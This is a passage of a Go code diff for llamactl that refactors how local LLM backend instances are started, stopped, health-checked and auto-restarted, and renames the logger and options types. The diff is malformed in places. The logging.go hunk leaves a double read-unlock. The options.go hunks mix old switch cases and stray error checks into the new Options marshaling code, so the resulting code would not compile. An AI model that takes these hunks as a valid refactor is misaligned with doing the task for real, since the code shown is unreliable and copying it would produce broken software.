 		if !inst.ShouldTimeout() {
 			t.Error("Instance should timeout when idle time exceeds configured timeout")
 		}
 	})
 }
 // mockTimeProvider for timeout testing
 type mockTimeProvider struct {
 	currentTime int64 // Unix timestamp
 }
 func (m *mockTimeProvider) Now() time.Time {
 	return time.Unix(m.currentTime, 0)
 }
--- a/pkg/instance/lifecycle.go
+++ b/pkg/instance/lifecycle.go
@@ -1,374 +0,0 @@
 package instance
 import (
 	"context"
 	"fmt"
 	"log"
 	"net/http"
 	"os/exec"
 	"runtime"
 	"syscall"
 	"time"
 	"llamactl/pkg/backends"
 )
 // Start starts the llama server instance and returns an error if it fails.
 func (i *Process) Start() error {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	if i.IsRunning() {
 		return fmt.Errorf("instance %s is already running", i.Name)
 	}
 	// Safety check: ensure options are valid
 	if i.options == nil {
 		return fmt.Errorf("instance %s has no options set", i.Name)
 	}
 	// Reset restart counter when manually starting (not during auto-restart)
 	// We can detect auto-restart by checking if restartCancel is set
 	if i.restartCancel == nil {
 		i.restarts = 0
 	}
 	// Initialize last request time to current time when starting
 	i.lastRequestTime.Store(i.timeProvider.Now().Unix())
 	// Create log files
 	if err := i.logger.Create(); err != nil {
 		return fmt.Errorf("failed to create log files: %w", err)
 	}
 	args := i.options.BuildCommandArgs()
 	i.ctx, i.cancel = context.WithCancel(context.Background())
 	var executable string
 	// Get executable from global configuration
 	switch i.options.BackendType {
 	case backends.BackendTypeLlamaCpp:
 		executable = i.globalBackendSettings.LlamaExecutable
 	case backends.BackendTypeMlxLm:
 		executable = i.globalBackendSettings.MLXLMExecutable
 	case backends.BackendTypeVllm:
 		executable = i.globalBackendSettings.VllmExecutable
 	default:
 		return fmt.Errorf("unsupported backend type: %s", i.options.BackendType)
 	}
 	i.cmd = exec.CommandContext(i.ctx, executable, args...)
 	if runtime.GOOS != "windows" {
 		setProcAttrs(i.cmd)
 	}
 	var err error
 	i.stdout, err = i.cmd.StdoutPipe()
 	if err != nil {
 		i.logger.Close()
 		return fmt.Errorf("failed to get stdout pipe: %w", err)
 	}
 	i.stderr, err = i.cmd.StderrPipe()
 	if err != nil {
 		i.stdout.Close()
 		i.logger.Close()
 		return fmt.Errorf("failed to get stderr pipe: %w", err)
 	}
 	if err := i.cmd.Start(); err != nil {
 		return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
 	}
 	i.SetStatus(Running)
 	// Create channel for monitor completion signaling
 	i.monitorDone = make(chan struct{})
 	go i.logger.readOutput(i.stdout)
 	go i.logger.readOutput(i.stderr)
 	go i.monitorProcess()
 	return nil
 }
 // Stop terminates the subprocess
 func (i *Process) Stop() error {
 	i.mu.Lock()
 	if !i.IsRunning() {
 		// Even if not running, cancel any pending restart
 		if i.restartCancel != nil {
 			i.restartCancel()
 			i.restartCancel = nil
 			log.Printf("Cancelled pending restart for instance %s", i.Name)
 		}
 		i.mu.Unlock()
 		return fmt.Errorf("instance %s is not running", i.Name)
 	}
 	// Cancel any pending restart
 	if i.restartCancel != nil {
 		i.restartCancel()
 		i.restartCancel = nil
 	}
 	// Set status to stopped first to signal intentional stop
 	i.SetStatus(Stopped)
 	// Clean up the proxy
 	i.proxy = nil
 	// Get the monitor done channel before releasing the lock
 	monitorDone := i.monitorDone
 	i.mu.Unlock()
 	// Stop the process with SIGINT if cmd exists
 	if i.cmd != nil && i.cmd.Process != nil {
 		if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
 			log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
 		}
 	}
 	// If no process exists, we can return immediately
 	if i.cmd == nil || monitorDone == nil {
 		i.logger.Close()
 		return nil
 	}
 	select {
 	case <-monitorDone:
 		// Process exited normally
 	case <-time.After(30 * time.Second):
 		// Force kill if it doesn't exit within 30 seconds
 		if i.cmd != nil && i.cmd.Process != nil {
 			killErr := i.cmd.Process.Kill()
 			if killErr != nil {
 				log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
 			}
 			log.Printf("Instance %s did not stop in time, force killed", i.Name)
 			// Wait a bit more for the monitor to finish after force kill
 			select {
 			case <-monitorDone:
 				// Monitor completed after force kill
 			case <-time.After(2 * time.Second):
 				log.Printf("Warning: Monitor goroutine did not complete after force kill for instance %s", i.Name)
 			}
 		}
 	}
 	i.logger.Close()
 	return nil
 }
 func (i *Process) LastRequestTime() int64 {
 	return i.lastRequestTime.Load()
 }
 func (i *Process) WaitForHealthy(timeout int) error {
 	if !i.IsRunning() {
 		return fmt.Errorf("instance %s is not running", i.Name)
 	}
 	if timeout <= 0 {
 		timeout = 30 // Default to 30 seconds if no timeout is specified
 	}
 	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
 	defer cancel()
 	// Get instance options to build the health check URL
 	opts := i.GetOptions()
 	if opts == nil {
 		return fmt.Errorf("instance %s has no options set", i.Name)
 	}
 	// Build the health check URL directly
 	var host string
 	var port int
 	switch opts.BackendType {
 	case backends.BackendTypeLlamaCpp:
 		if opts.LlamaServerOptions != nil {
 			host = opts.LlamaServerOptions.Host
 			port = opts.LlamaServerOptions.Port
 		}
 	case backends.BackendTypeMlxLm:
 		if opts.MlxServerOptions != nil {
 			host = opts.MlxServerOptions.Host
 			port = opts.MlxServerOptions.Port
 		}
 	case backends.BackendTypeVllm:
 		if opts.VllmServerOptions != nil {
 			host = opts.VllmServerOptions.Host
 			port = opts.VllmServerOptions.Port
 		}
 	}
 	if host == "" {
 		host = "localhost"
 	}
 	healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
 	// Create a dedicated HTTP client for health checks
 	client := &http.Client{
 		Timeout: 5 * time.Second, // 5 second timeout per request
 	}
 	// Helper function to check health directly
 	checkHealth := func() bool {
 		req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
 		if err != nil {
 			return false
 		}
 		resp, err := client.Do(req)
 		if err != nil {
 			return false
 		}
 		defer resp.Body.Close()
 		return resp.StatusCode == http.StatusOK
 	}
 	// Try immediate check first
 	if checkHealth() {
 		return nil // Instance is healthy
 	}
 	// If immediate check failed, start polling
 	ticker := time.NewTicker(1 * time.Second)
 	defer ticker.Stop()
 	for {
 		select {
 		case <-ctx.Done():
 			return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", i.Name, timeout)
 		case <-ticker.C:
 			if checkHealth() {
 				return nil // Instance is healthy
 			}
 			// Continue polling
 		}
 	}
 }
 func (i *Process) monitorProcess() {
 	defer func() {
 		i.mu.Lock()
 		if i.monitorDone != nil {
 			close(i.monitorDone)
 			i.monitorDone = nil
 		}
 		i.mu.Unlock()
 	}()
 	err := i.cmd.Wait()
 	i.mu.Lock()
 	// Check if the instance was intentionally stopped
 	if !i.IsRunning() {
 		i.mu.Unlock()
 		return
 	}
 	i.SetStatus(Stopped)
 	i.logger.Close()
 	// Cancel any existing restart context since we're handling a new exit
 	if i.restartCancel != nil {
 		i.restartCancel()
 		i.restartCancel = nil
 	}
 	// Log the exit
 	if err != nil {
 		log.Printf("Instance %s crashed with error: %v", i.Name, err)
 		// Handle restart while holding the lock, then release it
 		i.handleRestart()
 	} else {
 		log.Printf("Instance %s exited cleanly", i.Name)
 		i.mu.Unlock()
 	}
 }
 // handleRestart manages the restart process while holding the lock
 func (i *Process) handleRestart() {
 	// Validate restart conditions and get safe parameters
 	shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
 	if !shouldRestart {
 		i.SetStatus(Failed)
 		i.mu.Unlock()
 		return
 	}
 	i.restarts++
 	log.Printf("Auto-restarting instance %s (attempt %d/%d) in %v",
 		i.Name, i.restarts, maxRestarts, time.Duration(restartDelay)*time.Second)
 	// Create a cancellable context for the restart delay
 	restartCtx, cancel := context.WithCancel(context.Background())
 	i.restartCancel = cancel
 	// Release the lock before sleeping
 	i.mu.Unlock()
 	// Use context-aware sleep so it can be cancelled
 	select {
 	case <-time.After(time.Duration(restartDelay) * time.Second):
 		// Sleep completed normally, continue with restart
 	case <-restartCtx.Done():
 		// Restart was cancelled
 		log.Printf("Restart cancelled for instance %s", i.Name)
 		return
 	}
 	// Restart the instance
 	if err := i.Start(); err != nil {
 		log.Printf("Failed to restart instance %s: %v", i.Name, err)
 	} else {
 		log.Printf("Successfully restarted instance %s", i.Name)
 		// Clear the cancel function
 		i.mu.Lock()
 		i.restartCancel = nil
 		i.mu.Unlock()
 	}
 }
 // validateRestartConditions checks if the instance should be restarted and returns the parameters
 func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
 	if i.options == nil {
 		log.Printf("Instance %s not restarting: options are nil", i.Name)
 		return false, 0, 0
 	}
 	if i.options.AutoRestart == nil || !*i.options.AutoRestart {
 		log.Printf("Instance %s not restarting: AutoRestart is disabled", i.Name)
 		return false, 0, 0
 	}
 	if i.options.MaxRestarts == nil {
 		log.Printf("Instance %s not restarting: MaxRestarts is nil", i.Name)
 		return false, 0, 0
 	}
 	if i.options.RestartDelay == nil {
 		log.Printf("Instance %s not restarting: RestartDelay is nil", i.Name)
 		return false, 0, 0
 	}
 	// Values are already validated during unmarshaling/SetOptions
 	maxRestarts = *i.options.MaxRestarts
 	restartDelay = *i.options.RestartDelay
 	if i.restarts >= maxRestarts {
 		log.Printf("Instance %s exceeded max restart attempts (%d)", i.Name, maxRestarts)
 		return false, 0, 0
 	}
 	return true, maxRestarts, restartDelay
 }
--- a/pkg/instance/logging.go
+++ b/pkg/instance/logging.go
@@ -6,25 +6,30 @@ import (
 	"io"
 	"os"
 	"strings"
 	"sync"
 	"time"
 )
-type InstanceLogger struct {
+type logger struct {
 	name        string
 	logDir      string
 	logFile     *os.File
 	logFilePath string
 	mu          sync.RWMutex
 }
-func NewInstanceLogger(name string, logDir string) *InstanceLogger {
+func newLogger(name string, logDir string) *logger {
-	return &InstanceLogger{
+	return &logger{
 		name:   name,
 		logDir: logDir,
 	}
 }
-// Create creates and opens the log files for stdout and stderr
+// create creates and opens the log files for stdout and stderr
-func (i *InstanceLogger) Create() error {
+func (i *logger) create() error {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	if i.logDir == "" {
 		return fmt.Errorf("logDir is empty for instance %s", i.name)
 	}
@@ -51,17 +56,16 @@ func (i *InstanceLogger) Create() error {
 	return nil
 }
-// GetLogs retrieves the last n lines of logs from the instance
+// getLogs retrieves the last n lines of logs from the instance
-func (i *Process) GetLogs(num_lines int) (string, error) {
+func (i *logger) getLogs(num_lines int) (string, error) {
 	i.mu.RLock()
-	logFileName := i.logger.logFilePath
+	defer i.mu.RUnlock()
 	i.mu.RUnlock()
-	if logFileName == "" {
+	if i.logFilePath == "" {
-		return "", fmt.Errorf("log file not created for instance %s", i.Name)
+		return "", fmt.Errorf("log file not created for instance %s", i.name)
 	}
-	file, err := os.Open(logFileName)
+	file, err := os.Open(i.logFilePath)
 	if err != nil {
 		return "", fmt.Errorf("failed to open log file: %w", err)
 	}
@@ -93,8 +97,11 @@ func (i *Process) GetLogs(num_lines int) (string, error) {
 	return strings.Join(lines[start:], "\n"), nil
 }
-// closeLogFile closes the log files
+// close closes the log files
-func (i *InstanceLogger) Close() {
+func (i *logger) close() {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	if i.logFile != nil {
 		timestamp := time.Now().Format("2006-01-02 15:04:05")
 		fmt.Fprintf(i.logFile, "=== Instance %s stopped at %s ===\n\n", i.name, timestamp)
@@ -104,7 +111,7 @@ func (i *InstanceLogger) Close() {
 }
 // readOutput reads from the given reader and writes lines to the log file
-func (i *InstanceLogger) readOutput(reader io.ReadCloser) {
+func (i *logger) readOutput(reader io.ReadCloser) {
 	defer reader.Close()
 	scanner := bufio.NewScanner(reader)
--- a/pkg/instance/options.go
+++ b/pkg/instance/options.go
@@ -4,14 +4,14 @@ import (
 	"encoding/json"
 	"fmt"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/backends/mlx"
 	"llamactl/pkg/backends/vllm"
 	"llamactl/pkg/config"
 	"log"
 	"slices"
 	"sync"
 )
-type CreateInstanceOptions struct {
+// Options contains the actual configuration (exported - this is the public API).
 type Options struct {
 	// Auto restart
 	AutoRestart  *bool `json:"auto_restart,omitempty"`
 	MaxRestarts  *int  `json:"max_restarts,omitempty"`
@@ -20,21 +20,79 @@ type CreateInstanceOptions struct {
 	OnDemandStart *bool `json:"on_demand_start,omitempty"`
 	// Idle timeout
 	IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
-
+	// Environment variables
-	BackendType    backends.BackendType `json:"backend_type"`
+	Environment map[string]string `json:"environment,omitempty"`
-	BackendOptions map[string]any       `json:"backend_options,omitempty"`
+	// Assigned nodes
-
+	Nodes map[string]struct{} `json:"-"`
-	// Backend-specific options
+	// Backend options
-	LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
+	BackendOptions backends.Options `json:"-"`
 	MlxServerOptions   *mlx.MlxServerOptions        `json:"-"`
 	VllmServerOptions  *vllm.VllmServerOptions      `json:"-"`
 }
-// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
+// options wraps Options with thread-safe access (unexported).
-func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
+type options struct {
 	mu   sync.RWMutex
 	opts *Options
 }
 // newOptions creates a new options wrapper with the given Options
 func newOptions(opts *Options) *options {
 	return &options{
 		opts: opts,
 	}
 }
 // get returns a copy of the current options
 func (o *options) get() *Options {
 	o.mu.RLock()
 	defer o.mu.RUnlock()
 	return o.opts
 }
 // set updates the options
 func (o *options) set(opts *Options) {
 	o.mu.Lock()
 	defer o.mu.Unlock()
 	o.opts = opts
 }
 func (o *options) GetHost() string {
 	o.mu.RLock()
 	defer o.mu.RUnlock()
 	return o.opts.BackendOptions.GetHost()
 }
 func (o *options) GetPort() int {
 	o.mu.RLock()
 	defer o.mu.RUnlock()
 	return o.opts.BackendOptions.GetPort()
 }
 // MarshalJSON implements json.Marshaler for options wrapper
 func (o *options) MarshalJSON() ([]byte, error) {
 	o.mu.RLock()
 	defer o.mu.RUnlock()
 	return o.opts.MarshalJSON()
 }
 // UnmarshalJSON implements json.Unmarshaler for options wrapper
 func (o *options) UnmarshalJSON(data []byte) error {
 	o.mu.Lock()
 	defer o.mu.Unlock()
 	if o.opts == nil {
 		o.opts = &Options{}
 	}
 	return o.opts.UnmarshalJSON(data)
 }
 // UnmarshalJSON implements custom JSON unmarshaling for Options
 func (c *Options) UnmarshalJSON(data []byte) error {
 	// Use anonymous struct to avoid recursion
-	type Alias CreateInstanceOptions
+	type Alias Options
 	aux := &struct {
 		Nodes          []string             `json:"nodes,omitempty"`
 		BackendType    backends.BackendType `json:"backend_type"`
 		BackendOptions map[string]any       `json:"backend_options,omitempty"`
 		*Alias
 	}{
 		Alias: (*Alias)(c),
@@ -44,113 +102,88 @@ func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
 		return err
 	}
-	// Parse backend-specific options
+	// Convert nodes array to map
-	switch c.BackendType {
+	if len(aux.Nodes) > 0 {
-	case backends.BackendTypeLlamaCpp:
+		c.Nodes = make(map[string]struct{}, len(aux.Nodes))
-		if c.BackendOptions != nil {
+		for _, node := range aux.Nodes {
-			// Convert map to JSON and then unmarshal to LlamaServerOptions
+			c.Nodes[node] = struct{}{}
 			optionsData, err := json.Marshal(c.BackendOptions)
 			if err != nil {
 				return fmt.Errorf("failed to marshal backend options: %w", err)
 			}
 			c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
 			if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
 				return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
 			}
 		}
-	case backends.BackendTypeMlxLm:
+	}
 		if c.BackendOptions != nil {
 			optionsData, err := json.Marshal(c.BackendOptions)
 			if err != nil {
 				return fmt.Errorf("failed to marshal backend options: %w", err)
 			}
-			c.MlxServerOptions = &mlx.MlxServerOptions{}
+	// Create backend options struct and unmarshal
-			if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
+	c.BackendOptions = backends.Options{
-				return fmt.Errorf("failed to unmarshal MLX options: %w", err)
+		BackendType:    aux.BackendType,
-			}
+		BackendOptions: aux.BackendOptions,
-		}
+	}
 	case backends.BackendTypeVllm:
 		if c.BackendOptions != nil {
 			optionsData, err := json.Marshal(c.BackendOptions)
 			if err != nil {
 				return fmt.Errorf("failed to marshal backend options: %w", err)
 			}
-			c.VllmServerOptions = &vllm.VllmServerOptions{}
+	// Marshal the backend options to JSON for proper unmarshaling
-			if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
+	backendJson, err := json.Marshal(struct {
-				return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
+		BackendType    backends.BackendType `json:"backend_type"`
-			}
+		BackendOptions map[string]any       `json:"backend_options,omitempty"`
-		}
+	}{
-	default:
+		BackendType:    aux.BackendType,
-		return fmt.Errorf("unknown backend type: %s", c.BackendType)
+		BackendOptions: aux.BackendOptions,
 	})
 	if err != nil {
 		return fmt.Errorf("failed to marshal backend options: %w", err)
 	}
 	// Unmarshal into the backends.Options struct to trigger its custom unmarshaling
 	if err := json.Unmarshal(backendJson, &c.BackendOptions); err != nil {
 		return fmt.Errorf("failed to unmarshal backend options: %w", err)
 	}
 	return nil
 }
-// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
+// MarshalJSON implements custom JSON marshaling for Options
-func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
+func (c *Options) MarshalJSON() ([]byte, error) {
 	// Use anonymous struct to avoid recursion
-	type Alias CreateInstanceOptions
+	type Alias Options
 	aux := struct {
 		Nodes          []string             `json:"nodes,omitempty"` // Output as JSON array
 		BackendType    backends.BackendType `json:"backend_type"`
 		BackendOptions map[string]any       `json:"backend_options,omitempty"`
 		*Alias
 	}{
 		Alias: (*Alias)(c),
 	}
-	// Convert backend-specific options back to BackendOptions map for JSON
+	// Convert nodes map to array (sorted for consistency)
-	switch c.BackendType {
+	if len(c.Nodes) > 0 {
-	case backends.BackendTypeLlamaCpp:
+		aux.Nodes = make([]string, 0, len(c.Nodes))
-		if c.LlamaServerOptions != nil {
+		for node := range c.Nodes {
-			data, err := json.Marshal(c.LlamaServerOptions)
+			aux.Nodes = append(aux.Nodes, node)
 			if err != nil {
 				return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
 			}
 			var backendOpts map[string]any
 			if err := json.Unmarshal(data, &backendOpts); err != nil {
 				return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
 			}
 			aux.BackendOptions = backendOpts
 		}
 	case backends.BackendTypeMlxLm:
 		if c.MlxServerOptions != nil {
 			data, err := json.Marshal(c.MlxServerOptions)
 			if err != nil {
 				return nil, fmt.Errorf("failed to marshal MLX server options: %w", err)
 			}
 			var backendOpts map[string]any
 			if err := json.Unmarshal(data, &backendOpts); err != nil {
 				return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
 			}
 			aux.BackendOptions = backendOpts
 		}
 	case backends.BackendTypeVllm:
 		if c.VllmServerOptions != nil {
 			data, err := json.Marshal(c.VllmServerOptions)
 			if err != nil {
 				return nil, fmt.Errorf("failed to marshal vLLM server options: %w", err)
 			}
 			var backendOpts map[string]any
 			if err := json.Unmarshal(data, &backendOpts); err != nil {
 				return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
 			}
 			aux.BackendOptions = backendOpts
 		}
 		// Sort for consistent output
 		slices.Sort(aux.Nodes)
 	}
 	// Set backend type
 	aux.BackendType = c.BackendOptions.BackendType
 	// Marshal the backends.Options struct to get the properly formatted backend options
 	// Marshal a pointer to trigger the pointer receiver MarshalJSON method
 	backendData, err := json.Marshal(&c.BackendOptions)
 	if err != nil {
 		return nil, fmt.Errorf("failed to marshal backend options: %w", err)
 	}
 	// Unmarshal into a temporary struct to extract the backend_options map
 	var tempBackend struct {
 		BackendOptions map[string]any `json:"backend_options,omitempty"`
 	}
 	if err := json.Unmarshal(backendData, &tempBackend); err != nil {
 		return nil, fmt.Errorf("failed to unmarshal backend data: %w", err)
 	}
 	aux.BackendOptions = tempBackend.BackendOptions
 	return json.Marshal(aux)
 }
-// ValidateAndApplyDefaults validates the instance options and applies constraints
+// validateAndApplyDefaults validates the instance options and applies constraints
-func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
+func (c *Options) validateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
 	// Validate and apply constraints
 	if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
 		log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
@@ -187,25 +220,3 @@ func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSett
 		}
 	}
 }
 // BuildCommandArgs builds command line arguments for the backend
 func (c *CreateInstanceOptions) BuildCommandArgs() []string {
 	switch c.BackendType {
 	case backends.BackendTypeLlamaCpp:
 		if c.LlamaServerOptions != nil {
 			return c.LlamaServerOptions.BuildCommandArgs()
 		}
 	case backends.BackendTypeMlxLm:
 		if c.MlxServerOptions != nil {
 			return c.MlxServerOptions.BuildCommandArgs()
 		}
 	case backends.BackendTypeVllm:
 		if c.VllmServerOptions != nil {
 			// Prepend "serve" as first argument
 			args := []string{"serve"}
 			args = append(args, c.VllmServerOptions.BuildCommandArgs()...)
 			return args
 		}
 	}
 	return []string{}
 }
--- a/pkg/instance/process.go
+++ b/pkg/instance/process.go
@@ -0,0 +1,413 @@
 package instance
 import (
 	"context"
 	"fmt"
 	"io"
 	"log"
 	"net/http"
 	"os"
 	"os/exec"
 	"runtime"
 	"sync"
 	"syscall"
 	"time"
 )
 // process manages the OS process lifecycle for a local instance.
 // process owns its complete lifecycle including auto-restart logic.
 type process struct {
 	instance *Instance // Back-reference for SetStatus, GetOptions
 	mu            sync.RWMutex
 	cmd           *exec.Cmd
 	ctx           context.Context
 	cancel        context.CancelFunc
 	stdout        io.ReadCloser
 	stderr        io.ReadCloser
 	restarts      int
 	restartCancel context.CancelFunc
 	monitorDone   chan struct{}
 }
 // newProcess creates a new process component for the given instance
 func newProcess(instance *Instance) *process {
 	return &process{
 		instance: instance,
 	}
 }
 // start starts the OS process and returns an error if it fails.
 func (p *process) start() error {
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	if p.instance.IsRunning() {
 		return fmt.Errorf("instance %s is already running", p.instance.Name)
 	}
 	// Safety check: ensure options are valid
 	if p.instance.options == nil {
 		return fmt.Errorf("instance %s has no options set", p.instance.Name)
 	}
 	// Reset restart counter when manually starting (not during auto-restart)
 	// We can detect auto-restart by checking if restartCancel is set
 	if p.restartCancel == nil {
 		p.restarts = 0
 	}
 	// Initialize last request time to current time when starting
 	if p.instance.proxy != nil {
 		p.instance.proxy.updateLastRequestTime()
 	}
 	// Create context before building command (needed for CommandContext)
 	p.ctx, p.cancel = context.WithCancel(context.Background())
 	// Create log files
 	if err := p.instance.logger.create(); err != nil {
 		return fmt.Errorf("failed to create log files: %w", err)
 	}
 	// Build command using backend-specific methods
 	cmd, cmdErr := p.buildCommand()
 	if cmdErr != nil {
 		return fmt.Errorf("failed to build command: %w", cmdErr)
 	}
 	p.cmd = cmd
 	if runtime.GOOS != "windows" {
 		setProcAttrs(p.cmd)
 	}
 	var err error
 	p.stdout, err = p.cmd.StdoutPipe()
 	if err != nil {
 		p.instance.logger.close()
 		return fmt.Errorf("failed to get stdout pipe: %w", err)
 	}
 	p.stderr, err = p.cmd.StderrPipe()
 	if err != nil {
 		p.stdout.Close()
 		p.instance.logger.close()
 		return fmt.Errorf("failed to get stderr pipe: %w", err)
 	}
 	if err := p.cmd.Start(); err != nil {
 		return fmt.Errorf("failed to start instance %s: %w", p.instance.Name, err)
 	}
 	p.instance.SetStatus(Running)
 	// Create channel for monitor completion signaling
 	p.monitorDone = make(chan struct{})
 	go p.instance.logger.readOutput(p.stdout)
 	go p.instance.logger.readOutput(p.stderr)
 	go p.monitorProcess()
 	return nil
 }
 // stop terminates the subprocess without restarting
 func (p *process) stop() error {
 	p.mu.Lock()
 	if !p.instance.IsRunning() {
 		// Even if not running, cancel any pending restart
 		if p.restartCancel != nil {
 			p.restartCancel()
 			p.restartCancel = nil
 			log.Printf("Cancelled pending restart for instance %s", p.instance.Name)
 		}
 		p.mu.Unlock()
 		return fmt.Errorf("instance %s is not running", p.instance.Name)
 	}
 	// Cancel any pending restart
 	if p.restartCancel != nil {
 		p.restartCancel()
 		p.restartCancel = nil
 	}
 	// Set status to stopped first to signal intentional stop
 	p.instance.SetStatus(Stopped)
 	// Get the monitor done channel before releasing the lock
 	monitorDone := p.monitorDone
 	p.mu.Unlock()
 	// Stop the process with SIGINT if cmd exists
 	if p.cmd != nil && p.cmd.Process != nil {
 		if err := p.cmd.Process.Signal(syscall.SIGINT); err != nil {
 			log.Printf("Failed to send SIGINT to instance %s: %v", p.instance.Name, err)
 		}
 	}
 	// If no process exists, we can return immediately
 	if p.cmd == nil || monitorDone == nil {
 		p.instance.logger.close()
 		return nil
 	}
 	select {
 	case <-monitorDone:
 		// Process exited normally
 	case <-time.After(30 * time.Second):
 		// Force kill if it doesn't exit within 30 seconds
 		if p.cmd != nil && p.cmd.Process != nil {
 			killErr := p.cmd.Process.Kill()
 			if killErr != nil {
 				log.Printf("Failed to force kill instance %s: %v", p.instance.Name, killErr)
 			}
 			log.Printf("Instance %s did not stop in time, force killed", p.instance.Name)
 			// Wait a bit more for the monitor to finish after force kill
 			select {
 			case <-monitorDone:
 				// Monitor completed after force kill
 			case <-time.After(2 * time.Second):
 				log.Printf("Warning: Monitor goroutine did not complete after force kill for instance %s", p.instance.Name)
 			}
 		}
 	}
 	p.instance.logger.close()
 	return nil
 }
 // restart manually restarts the process (resets restart counter)
 func (p *process) restart() error {
 	// Stop the process first
 	if err := p.stop(); err != nil {
 		// If it's not running, that's ok - we'll just start it
 		if err.Error() != fmt.Sprintf("instance %s is not running", p.instance.Name) {
 			return fmt.Errorf("failed to stop instance during restart: %w", err)
 		}
 	}
 	// Reset restart counter for manual restart
 	p.mu.Lock()
 	p.restarts = 0
 	p.mu.Unlock()
 	// Start the process
 	return p.start()
 }
 // waitForHealthy waits for the process to become healthy
 func (p *process) waitForHealthy(timeout int) error {
 	if !p.instance.IsRunning() {
 		return fmt.Errorf("instance %s is not running", p.instance.Name)
 	}
 	if timeout <= 0 {
 		timeout = 30 // Default to 30 seconds if no timeout is specified
 	}
 	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
 	defer cancel()
 	// Get host/port from instance
 	host := p.instance.options.GetHost()
 	port := p.instance.options.GetPort()
 	healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
 	// Create a dedicated HTTP client for health checks
 	client := &http.Client{
 		Timeout: 5 * time.Second, // 5 second timeout per request
 	}
 	// Helper function to check health directly
 	checkHealth := func() bool {
 		req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
 		if err != nil {
 			return false
 		}
 		resp, err := client.Do(req)
 		if err != nil {
 			return false
 		}
 		defer resp.Body.Close()
 		return resp.StatusCode == http.StatusOK
 	}
 	// Try immediate check first
 	if checkHealth() {
 		return nil // Instance is healthy
 	}
 	// If immediate check failed, start polling
 	ticker := time.NewTicker(1 * time.Second)
 	defer ticker.Stop()
 	for {
 		select {
 		case <-ctx.Done():
 			return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", p.instance.Name, timeout)
 		case <-ticker.C:
 			if checkHealth() {
 				return nil // Instance is healthy
 			}
 			// Continue polling
 		}
 	}
 }
 // monitorProcess monitors the OS process and handles crashes/exits
 func (p *process) monitorProcess() {
 	defer func() {
 		p.mu.Lock()
 		if p.monitorDone != nil {
 			close(p.monitorDone)
 			p.monitorDone = nil
 		}
 		p.mu.Unlock()
 	}()
 	err := p.cmd.Wait()
 	p.mu.Lock()
 	// Check if the instance was intentionally stopped
 	if !p.instance.IsRunning() {
 		p.mu.Unlock()
 		return
 	}
 	p.instance.SetStatus(Stopped)
 	p.instance.logger.close()
 	// Cancel any existing restart context since we're handling a new exit
 	if p.restartCancel != nil {
 		p.restartCancel()
 		p.restartCancel = nil
 	}
 	// Log the exit
 	if err != nil {
 		log.Printf("Instance %s crashed with error: %v", p.instance.Name, err)
 		// Handle auto-restart logic
 		p.handleAutoRestart(err)
 	} else {
 		log.Printf("Instance %s exited cleanly", p.instance.Name)
 		p.mu.Unlock()
 	}
 }
 // shouldAutoRestart checks if the process should auto-restart
 func (p *process) shouldAutoRestart() bool {
 	opts := p.instance.GetOptions()
 	if opts == nil {
 		log.Printf("Instance %s not restarting: options are nil", p.instance.Name)
 		return false
 	}
 	if opts.AutoRestart == nil || !*opts.AutoRestart {
 		log.Printf("Instance %s not restarting: AutoRestart is disabled", p.instance.Name)
 		return false
 	}
 	if opts.MaxRestarts == nil {
 		log.Printf("Instance %s not restarting: MaxRestarts is nil", p.instance.Name)
 		return false
 	}
 	maxRestarts := *opts.MaxRestarts
 	if p.restarts >= maxRestarts {
 		log.Printf("Instance %s exceeded max restart attempts (%d)", p.instance.Name, maxRestarts)
 		return false
 	}
 	return true
 }
 // handleAutoRestart manages the auto-restart process
 func (p *process) handleAutoRestart(err error) {
 	// Check if should restart
 	if !p.shouldAutoRestart() {
 		p.instance.SetStatus(Failed)
 		p.mu.Unlock()
 		return
 	}
 	// Get restart parameters
 	opts := p.instance.GetOptions()
 	if opts.RestartDelay == nil {
 		log.Printf("Instance %s not restarting: RestartDelay is nil", p.instance.Name)
 		p.instance.SetStatus(Failed)
 		p.mu.Unlock()
 		return
 	}
 	restartDelay := *opts.RestartDelay
 	maxRestarts := *opts.MaxRestarts
 	p.restarts++
 	// Set status to Restarting instead of leaving as Stopped
 	p.instance.SetStatus(Restarting)
